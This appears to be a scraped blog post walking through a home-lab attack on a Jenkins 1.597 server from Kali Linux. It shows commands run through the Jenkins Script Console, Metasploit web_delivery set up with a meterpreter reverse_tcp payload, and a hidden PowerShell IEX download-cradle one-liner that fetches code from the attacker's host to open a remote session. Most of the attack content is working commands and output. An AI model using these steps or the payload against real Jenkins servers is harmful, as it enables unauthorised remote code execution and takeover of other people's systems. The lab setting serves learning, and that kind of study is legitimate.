I’m running a Windows 8 x64 with Jenkins CI v. 1.597 in a virtual machine, and a Kali Linux on another virtual machine.<\/p>\n
<\/p>\n
A clean windows machine, running Jenkins.<\/p>\n Another VM running Kali Linux, with access to the Windows machine’s Jenkins web panel.<\/p>\n Let’s “Manage Jenkins” and open it’s Script console<\/p>\n After reading Jenkins documentation, I found out that you can run commands – Let’s ping google<\/p>\n Let’s open up metasploit While that opens, let’s find our local IP We use the exploit called web_delivery An overview of all the options we have set This will execute the exploit <\/p>\n Awesome!! – Now we can run this powershell command on any windows machine (locally of course \ud83d\ude42 ) and we will get a session to that machine.<\/p>\n Should we try running this on the Jenkins server? – Hell yeah!<\/p>\n This is obviously my unique string, yours will be different<\/em><\/p>\n![\"1\"](\"http:\/\/dan.thoeisen.dk\/hjem\/wp-content\/uploads\/11.jpg\")
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\nprintln new ProcessBuilder('ping',\"google.com\").redirectErrorStream(true).start().text <\/code><\/p>\n<\/a><\/p>\nmsfconsole<\/code><\/p>\n<\/a><\/p>\nifconfig<\/code><\/p>\n<\/a><\/p>\n
\nuse exploit\/multi\/script\/web_delivery<\/code>
\nWe use target 2 which is Powershell (Since this has to be native windows stuff. But you could also use Python (if the machine had python installed))
\nset TARGET 2<\/code>
\nWe are using the payload meterpreter\/reverse_tcp
\nset PAYLOAD windows\/meterpreter\/reverse_tcp<\/code>
\nYou already know your local IP, so just put it in there
\nset LHOST <\/code><\/code>
\n<\/a><\/p>\nshow options<\/code><\/p>\n<\/a><\/p>\n
\nexploit<\/code><\/p>\npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http:\/\/192.168.234.128:8080\/PVdPa2LGUZ6tOaQ'))<\/code><\/p>\n